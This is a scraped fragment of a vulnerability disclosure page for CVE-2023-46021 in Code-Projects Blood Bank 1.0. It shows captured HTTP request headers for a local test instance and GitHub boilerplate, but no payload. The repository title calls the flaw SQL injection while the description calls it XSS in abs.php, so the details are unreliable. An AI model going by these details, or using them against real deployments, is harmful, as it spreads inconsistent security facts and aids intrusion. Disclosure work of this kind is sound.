    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    ---

CVE-2023-46021: GitHub - ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Tag

#php